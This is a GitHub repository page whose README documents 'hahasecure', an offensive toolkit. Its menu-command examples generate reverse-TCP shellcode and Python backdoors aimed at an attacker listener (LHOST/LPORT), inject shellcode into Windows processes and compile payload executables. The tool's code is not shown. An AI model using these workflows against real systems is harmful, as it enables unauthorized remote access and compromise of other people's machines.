Skip to content
/ hahasecure Public

"A powerful exploit development toolkit for generating shellcode, creating backdoors, injecting processes, and encoding payloads. Designed for penetration testers and red teamers."

livepwn.medium.com

License

Apache-2.0 license
1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

livepwn/hahasecure

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

15 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
hahasecure.py
hahasecure.py
 
 

Repository files navigation

hahasecure - A Multi-Purpose Exploitation Toolkit

hahasecure

hahasecure is a versatile exploitation toolkit designed for penetration testers, security researchers, and red teamers. It provides a wide range of features, including shellcode generation, backdoor creation, process injection, encoding, and executable generation for multiple platforms.

Author:

Livepwn

Features

  • Shellcode Generation: Generate shellcode for various platforms (Linux x86/x64, Windows x86/x64, ARM).

  • Backdoor Creation: Create Python-based backdoors for Windows and Linux.

  • Process Injection: Inject shellcode into running processes (Windows only).

  • Encoding Tools: Encode data using XOR, Base64, AES, and ROT13.

  • Executable Generation: Compile shellcode into executables for Windows and Linux.

Installation

Prerequisites

  • Python 3.x

  • colorama library (pip install colorama)

  • pyfiglet library (pip install pyfiglet)

  • pycryptodome library (pip install pycryptodome)

  • mingw (for Windows executable generation)

  • nasm and ld (for Linux executable generation)

Installation Steps

Clone the repository:

git clone https://github.com/livepwn/hahasecure.git

cd hahasecure

Run the tool:

python hahasecure.py 

Alert: Donot run this tool with sudo or chmod.

Usage

Main Menu

  • When you run the tool, you'll see the main menu:
hahasecure > 
Available commands:

help: Show the help menu.

use <module>: Switch to a specific module (e.g., use shellcode).

show <database>: Show available options for a module (e.g., show shellcodes).

os <command>: Execute an OS command.

clear: Clear the screen.

exit: Exit the tool.

Modules

  1. Shellcode Module
  • Generate shellcode for reverse TCP connections.

Commands:

  • set : Set options like LHOST, LPORT, and PLATFORM.

  • generate: Generate shellcode.

  • show options: Show current options.

Example:

hahasecure > use shellcode
hahasecure/shellcode > set LHOST 192.168.1.100
hahasecure/shellcode > set LPORT 4444
hahasecure/shellcode > set PLATFORM linux/x64
hahasecure/shellcode > generate
  1. Backdoor Module
  • Create Python-based backdoors.

Commands:

  • set : Set options like LHOST, LPORT, and PLATFORM.

  • generate: Generate a backdoor.

  • show options: Show current options.

Example:

hahasecure > use backdoor
hahasecure/backdoor > set LHOST 192.168.1.100
hahasecure/backdoor > set LPORT 4444
hahasecure/backdoor > set PLATFORM python/windows
hahasecure/backdoor > generate
  1. Injector Module
  • Inject shellcode into a running process (Windows only).

Commands:

  • inject : Inject shellcode into a process with the specified PID.

Example:

hahasecure > use injector
hahasecure/injector > inject 1234
  1. Encoder Module
  • Encode data using XOR, Base64, AES, or ROT13.

Commands:

  • set : Set options like ENCODING and KEY.

  • encode : Encode the provided data.

  • show options: Show current options.

Example:

hahasecure > use encoder
hahasecure/encoder > set ENCODING xor
hahasecure/encoder > set KEY secret
hahasecure/encoder > encode HelloWorld
  1. Executable Module
  • Compile shellcode into executables for Windows and Linux.

Commands:

  • set : Set options like PLATFORM and OUTPUT.

  • generate: Generate an executable.

  • show options: Show current options.

Example:

hahasecure > use executable
hahasecure/executable > set PLATFORM windows
hahasecure/executable > set OUTPUT payload.exe
hahasecure/executable > generate

Examples:

  • Generate a Linux Reverse TCP Shellcode
hahasecure > use shellcode
hahasecure/shellcode > set LHOST 192.168.1.100
hahasecure/shellcode > set LPORT 4444
hahasecure/shellcode > set PLATFORM linux/x64
hahasecure/shellcode > generate
  • Create a Python Backdoor for Windows
hahasecure > use backdoor
hahasecure/backdoor > set LHOST 192.168.1.100
hahasecure/backdoor > set LPORT 4444
hahasecure/backdoor > set PLATFORM python/windows
hahasecure/backdoor > generate
  • Inject Shellcode into a Process
hahasecure > use injector
hahasecure/injector > inject 1234
  • Encode Data with XOR
hahasecure > use encoder
hahasecure/encoder > set ENCODING xor
hahasecure/encoder > set KEY secret
hahasecure/encoder > encode HelloWorld
  • Generate a Windows Executable
hahasecure > use executable
hahasecure/executable > set PLATFORM windows
hahasecure/executable > set OUTPUT payload.exe
hahasecure/executable > generate

Contributing

Contributions are welcome! Please open an issue or submit a pull request for any improvements or bug fixes.

License

This project is licensed under the Apache-2.0 License. See the LICENSE file for details.

Disclaimer

This tool is intended for educational and ethical purposes only. Do not use it for illegal activities. The authors are not responsible for any misuse of this tool.

Contact For questions or feedback, please open an issue on GitHub or contact me. email: [email protected]

About

"A powerful exploit development toolkit for generating shellcode, creating backdoors, injecting processes, and encoding payloads. Designed for penetration testers and red teamers."

livepwn.medium.com

Topics

backdoor shellcode exploitation-framework hacker-tools ctf-tools security-tools exploit-development vulnerability-research redteam-tools vuln-dev gh0st-toolkit xpl0it-toolkit livepwn realworldsec hahasecure

Resources

Readme

License

Apache-2.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages